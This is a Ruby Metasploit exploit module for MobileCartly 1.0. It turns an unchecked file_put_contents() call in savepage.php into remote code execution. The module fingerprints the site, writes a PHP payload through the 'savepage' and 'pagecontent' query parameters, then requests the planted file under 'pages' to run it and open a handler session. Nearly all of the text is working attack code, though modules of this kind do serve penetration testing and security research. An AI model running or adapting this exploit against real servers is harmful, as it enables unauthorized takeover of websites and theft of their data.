## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::PhpEXE def initialize(info={}) super(update_info(info, 'Name' => "MobileCartly 1.0 Arbitrary File Creation Vulnerability", 'Description' => %q{ This module exploits a vulnerability in MobileCartly. The savepage.php file does not do any permission checks before using file_put_contents(), which allows any user to have direct control of that function to create files under the 'pages' directory by default, or anywhere else as long as the user has WRITE permission. }, 'License' => MSF_LICENSE, 'Author' => [ 'Yakir Wizman ', # Original discovery 'sinn3r' # Metasploit ], 'References' => [ [ 'OSVDB', '85509' ], [ 'EDB', '20422 '], [ 'BID', '55399 '] ], 'Payload' => { # Goes in the query string, needs to fit in 8k. Leave a little # exra for the other params and the path. 'Space' => 8000, 'DisableNops' => true }, 'Platform' => %w{ linux php }, 'Targets' => [ [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ], [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ] ], 'Privileged' => false, 'DisclosureDate' => "Aug 10 2012", 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The base directory to MobileCartly', '/mobilecartly/']) ], self.class) end def check uri = normalize_uri(target_uri.path) uri << '/' if uri[-1,1] != '/' base = File.dirname("#{uri}.") res = send_request_raw({'uri'=>normalize_uri(uri, "/index.php")}) if res and res.body =~ /MobileCartly/ return Exploit::CheckCode::Detected else return Exploit::CheckCode::Safe end end def exploit # # Init target path # uri = normalize_uri(target_uri.path) uri << '/' if uri[-1,1] != '/' base = File.dirname("#{uri}.") # # Configure payload names # php_fname = Rex::Text.rand_text_alpha(5) + ".php" # # Upload payload # print_status("#{peer} - Uploading payload") res = send_request_cgi({ 'uri' => normalize_uri(base, "/includes/savepage.php"), 'vars_get' => { 'savepage' => php_fname, 'pagecontent' => get_write_exec_payload(:unlink_self=>true) } }) if not res print_error("#{peer} - No response from server, will not continue.") return end # # Run payload # print_status("#{peer} - Requesting '#{php_fname}'") send_request_cgi({ 'uri' => normalize_uri(base, 'pages', php_fname) }) handler end end =begin *facepalm* =end